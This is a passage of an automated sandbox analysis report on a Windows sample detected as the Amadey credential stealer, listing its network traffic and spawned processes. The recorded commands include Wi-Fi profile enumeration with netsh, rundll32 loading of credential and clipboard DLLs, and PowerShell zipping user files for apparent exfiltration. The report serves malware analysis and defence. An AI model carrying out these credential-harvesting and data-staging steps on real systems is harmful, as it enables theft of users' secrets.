                                                                                                                                                                                                                                      x-envoy-upstream-service-time: 2
                                                                                                                                                                                                                                      via: 1.1 google
                                                                                                                                                                                                                                      strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-04-19 01:30:05 UTC742INData Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 38 31 2e 31 38 31 2e 35 37 2e 35 32 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 31 2e 31 38 31 2e 35 37 2e 35 32 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 41 74 6c 61 6e 74 61 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 47 65 6f 72 67 69 61 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 33 33 2e 37 34 39 30 2c 2d 38 34 2e 33 38 38 30 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 0a 20 20 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 33 30 33 30 32 22 2c 0a 20 20 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 41 6d 65 72 69 63 61 2f
                                                                                                                                                                                                                                      Data Ascii: { "input": "81.181.57.52", "data": { "ip": "81.181.57.52", "city": "Atlanta", "region": "Georgia", "country": "US", "loc": "33.7490,-84.3880", "org": "AS212238 Datacamp Limited", "postal": "30302", "timezone": "America/
                                                                                                                                                                                                                                      2024-04-19 01:30:05 UTC238INData Raw: 61 64 64 72 65 73 73 22 3a 20 22 41 76 65 72 65 73 63 75 20 4d 61 72 65 73 61 6c 20 38 2d 31 30 2c 20 42 75 63 68 61 72 65 73 74 2c 20 52 6f 6d 61 6e 69 61 22 2c 0a 20 20 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 52 4f 22 2c 0a 20 20 20 20 20 20 22 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 2d 62 69 6e 62 6f 78 40 72 6e 63 2e 72 6f 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 41 62 75 73 65 20 63 6f 6e 74 61 63 74 20 72 6f 6c 65 20 6f 62 6a 65 63 74 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 31 2e 31 38 31 2e 34 38 2e 30 2f 32 30 22 2c 0a 20 20 20 20 20 20 22 70 68 6f 6e 65 22 3a 20 22 2b 34 30 20 33 37 38 20 36 30 30 20 30 30 30 22 0a 20 20 20 20 7d 0a 20 20 7d 0a 7d
                                                                                                                                                                                                                                      Data Ascii: address": "Averescu Maresal 8-10, Bucharest, Romania", "country": "RO", "email": "abuse-binbox@rnc.ro", "name": "Abuse contact role object", "network": "81.181.48.0/20", "phone": "+40 378 600 000" } }}


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      36192.168.2.549878104.26.5.154437476C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:30:05 UTC261OUTGET /demo/home.php?s=81.181.57.52 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: db-ip.com
                                                                                                                                                                                                                                      2024-04-19 01:30:05 UTC654INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:05 GMT
                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      x-iplb-request-id: AC4546DE:9DC0_93878F2E:0050_6621C91D_8C5D355:7B63
                                                                                                                                                                                                                                      x-iplb-instance: 59128
                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uvC68%2BGzSO%2FFqbJpGfiCrT57xqq5L2O3mBSD3UZIxUorJqEarsPEfE57UjLXgBipg1I8kj4ATRZ4lZ0UqW8k%2FtRupcXT4psTNAHy8gtuZfeRsWFJ5IbRdh81wg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 87692099b85144f1-ATL
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      2024-04-19 01:30:05 UTC85INData Raw: 34 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 65 6d 6f 49 6e 66 6f 22 3a 7b 22 65 72 72 6f 72 22 3a 22 6f 76 65 72 20 71 75 65 72 79 20 6c 69 6d 69 74 2c 20 70 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 22 7d 7d 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 4f{"status":"ok","demoInfo":{"error":"over query limit, please try again later"}}
                                                                                                                                                                                                                                      2024-04-19 01:30:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      37192.168.2.54992334.117.186.192443
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:30:17 UTC237OUTGET /widget/demo/81.181.57.52 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Referer: https://ipinfo.io/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: ipinfo.io
                                                                                                                                                                                                                                      2024-04-19 01:30:17 UTC513INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      server: nginx/1.24.0
                                                                                                                                                                                                                                      date: Fri, 19 Apr 2024 01:30:17 GMT
                                                                                                                                                                                                                                      content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                      Content-Length: 980
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                      x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                      x-envoy-upstream-service-time: 4
                                                                                                                                                                                                                                      via: 1.1 google
                                                                                                                                                                                                                                      strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-04-19 01:30:17 UTC742INData Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 38 31 2e 31 38 31 2e 35 37 2e 35 32 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 31 2e 31 38 31 2e 35 37 2e 35 32 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 41 74 6c 61 6e 74 61 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 47 65 6f 72 67 69 61 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 33 33 2e 37 34 39 30 2c 2d 38 34 2e 33 38 38 30 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 0a 20 20 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 33 30 33 30 32 22 2c 0a 20 20 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 41 6d 65 72 69 63 61 2f
                                                                                                                                                                                                                                      Data Ascii: { "input": "81.181.57.52", "data": { "ip": "81.181.57.52", "city": "Atlanta", "region": "Georgia", "country": "US", "loc": "33.7490,-84.3880", "org": "AS212238 Datacamp Limited", "postal": "30302", "timezone": "America/
                                                                                                                                                                                                                                      2024-04-19 01:30:17 UTC238INData Raw: 61 64 64 72 65 73 73 22 3a 20 22 41 76 65 72 65 73 63 75 20 4d 61 72 65 73 61 6c 20 38 2d 31 30 2c 20 42 75 63 68 61 72 65 73 74 2c 20 52 6f 6d 61 6e 69 61 22 2c 0a 20 20 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 52 4f 22 2c 0a 20 20 20 20 20 20 22 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 2d 62 69 6e 62 6f 78 40 72 6e 63 2e 72 6f 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 41 62 75 73 65 20 63 6f 6e 74 61 63 74 20 72 6f 6c 65 20 6f 62 6a 65 63 74 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 31 2e 31 38 31 2e 34 38 2e 30 2f 32 30 22 2c 0a 20 20 20 20 20 20 22 70 68 6f 6e 65 22 3a 20 22 2b 34 30 20 33 37 38 20 36 30 30 20 30 30 30 22 0a 20 20 20 20 7d 0a 20 20 7d 0a 7d
                                                                                                                                                                                                                                      Data Ascii: address": "Averescu Maresal 8-10, Bucharest, Romania", "country": "RO", "email": "abuse-binbox@rnc.ro", "name": "Abuse contact role object", "network": "81.181.48.0/20", "phone": "+40 378 600 000" } }}


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      38192.168.2.549925104.26.5.15443
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:30:17 UTC261OUTGET /demo/home.php?s=81.181.57.52 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: db-ip.com
                                                                                                                                                                                                                                      2024-04-19 01:30:18 UTC650INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:18 GMT
                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      x-iplb-request-id: AC471F97:A928_93878F2E:0050_6621C92A_8C5D50E:7B63
                                                                                                                                                                                                                                      x-iplb-instance: 59128
                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eYv05HjRhLHsdVz1gxyROdeitHSLFuKQwi1zS3%2BGWpbkfuD5Jie98lXhCBpNKKVNoSrBNCi38PA6AbprqfWfMozsFi7IwIPYPFUK2YNNpGKNkoMi0kaNCdPQcw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 876920e6bb36ada7-ATL
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      2024-04-19 01:30:18 UTC85INData Raw: 34 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 65 6d 6f 49 6e 66 6f 22 3a 7b 22 65 72 72 6f 72 22 3a 22 6f 76 65 72 20 71 75 65 72 79 20 6c 69 6d 69 74 2c 20 70 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 22 7d 7d 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 4f{"status":"ok","demoInfo":{"error":"over query limit, please try again later"}}
                                                                                                                                                                                                                                      2024-04-19 01:30:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      39192.168.2.55055520.189.173.25443
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:33:14 UTC828OUTPOST /OneCollector/1.0/ HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521
                                                                                                                                                                                                                                      AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAENhIsZk1icdmK4NNtUk6KLPgAMvy17Udgd1MlHE7GXRAxu9wDd84HaOk1nGIMKru6radFnZDfu7zWhcmz9j72MdI/lM5JykN5JyMCsrKKjhnWsxMrSmUTHFAm4lCtsR/4kXJ5OVGBubVm1qKlLaqfTPe4/QIS6EsPZhp2A+GbXPmd9v7KWe0y9ZBVkGnVgT2XAL69MHD65Z2sZ/bvdyK2Z9GRgl5dhajOwb9unLzQz2LihgZzhVMiIEIlP0Ox0qtNEB072yB6rGFSpbQMfXp3Qm9wrLMHPG0cNIMKQ3+lgA3sY/VTGnPGJVnsHSsfW8D9dyBIAE=&p=
                                                                                                                                                                                                                                      Client-Id: NO_AUTH
                                                                                                                                                                                                                                      Content-Encoding: deflate
                                                                                                                                                                                                                                      Content-Type: application/bond-compact-binary
                                                                                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                                                                                      SDK-Version: EVT-Windows-C++-No-3.4.15.1
                                                                                                                                                                                                                                      Upload-Time: 1713490393138
                                                                                                                                                                                                                                      Host: self.events.data.microsoft.com
                                                                                                                                                                                                                                      Content-Length: 7974
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-04-19 01:33:14 UTC7974OUTData Raw: ed 7c 5b ac 5c d7 79 de e8 12 96 a2 28 8a 96 64 59 92 15 8b 11 64 d7 8a 67 4e d7 fd 32 68 10 53 3c 94 45 57 34 15 1e 4a b2 03 04 ec 9e 99 7d 66 36 39 33 fb 68 2e bc 08 79 10 dc 22 40 0a a4 28 03 14 28 fa 64 f4 21 b0 80 5e f2 d0 a2 48 9e f2 10 20 75 99 87 14 05 fa 92 16 68 0b f4 a5 4f 41 d1 f6 a5 05 da ef 5f fb b6 66 f1 88 76 0c 43 88 01 1e 90 3c fc d7 5a 7b 5d ff ff fb bf 7f ad b5 f7 9b 4f c8 3d 76 49 5d 39 3c 2c c6 f9 f5 83 bb eb 4d be a8 7f bd 93 67 f3 cd ec 72 be c9 26 d9 26 db cf 6f a1 c4 85 72 b9 2e e7 05 12 f2 c9 47 7f f6 af ff c3 bf f8 7f 7f e7 f7 ff e3 17 3e 7d bd 1c 8e 27 4e 1a 23 8c e1 7c ac c6 59 96 b9 c3 b1 1e 89 dc 0a 97 e7 8e 4f fe dd 89 ef 3f 79 ff 8b a7 1e 2b 4e 7f 70 f9 76 b6 ca fb e7 2e 2d c7 7b bf 7d aa 92 04 eb f3 de fd 17 4f 3d d6 bb
                                                                                                                                                                                                                                      Data Ascii: |[\y(dYdgN2hS<EW4J}f693h.y"@((d!^H uhOA_fvC<Z{]O=vI]9<,Mgr&&or.G>}'N#|YO?y+Npv.-{}O=
                                                                                                                                                                                                                                      2024-04-19 01:33:14 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                      2024-04-19 01:33:14 UTC443INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 9
                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                      time-delta-millis: 1217
                                                                                                                                                                                                                                      Access-Control-Allow-Headers: time-delta-millis
                                                                                                                                                                                                                                      Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                      Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:14 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      {"acc":4}


                                                                                                                                                                                                                                      Statistics

                                                                                                                                                                                                                                      CPU Usage

                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      Memory Usage

                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                                      Behavior

                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      System Behavior

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                      Start time:03:27:56
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe"
                                                                                                                                                                                                                                      Imagebase:0xb80000
                                                                                                                                                                                                                                      File size:2'962'432 bytes
                                                                                                                                                                                                                                      MD5 hash:F854143C49C4D2FA4CF73BAB97BA8D3A
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2052123987.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                                                                      Start time:03:28:00
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Imagebase:0x700000
                                                                                                                                                                                                                                      File size:2'962'432 bytes
                                                                                                                                                                                                                                      MD5 hash:F854143C49C4D2FA4CF73BAB97BA8D3A
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2089957305.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                      • Detection: 50%, ReversingLabs
                                                                                                                                                                                                                                      • Detection: 54%, Virustotal, Browse
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                                                      Start time:03:28:02
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
                                                                                                                                                                                                                                      Imagebase:0x700000
                                                                                                                                                                                                                                      File size:2'962'432 bytes
                                                                                                                                                                                                                                      MD5 hash:F854143C49C4D2FA4CF73BAB97BA8D3A
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.2110741282.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                                                      Start time:03:29:00
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Imagebase:0x700000
                                                                                                                                                                                                                                      File size:2'962'432 bytes
                                                                                                                                                                                                                                      MD5 hash:F854143C49C4D2FA4CF73BAB97BA8D3A
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.2687465416.0000000004F30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                                                      Start time:03:29:05
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                                                                                                                                                                                                                                      Imagebase:0xb90000
                                                                                                                                                                                                                                      File size:61'440 bytes
                                                                                                                                                                                                                                      MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                                                                      Start time:03:29:06
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                                                                                                                                                                                                                                      Imagebase:0x7ff6e2750000
                                                                                                                                                                                                                                      File size:71'680 bytes
                                                                                                                                                                                                                                      MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                                                                      Start time:03:29:06
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:netsh wlan show profiles
                                                                                                                                                                                                                                      Imagebase:0x7ff6632b0000
                                                                                                                                                                                                                                      File size:96'768 bytes
                                                                                                                                                                                                                                      MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:10
                                                                                                                                                                                                                                      Start time:03:29:06
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:11
                                                                                                                                                                                                                                      Start time:03:29:07
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                                                                                                                                                                                                                                      Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:12
                                                                                                                                                                                                                                      Start time:03:29:07
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:13
                                                                                                                                                                                                                                      Start time:03:29:07
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
                                                                                                                                                                                                                                      Imagebase:0xb90000
                                                                                                                                                                                                                                      File size:61'440 bytes
                                                                                                                                                                                                                                      MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
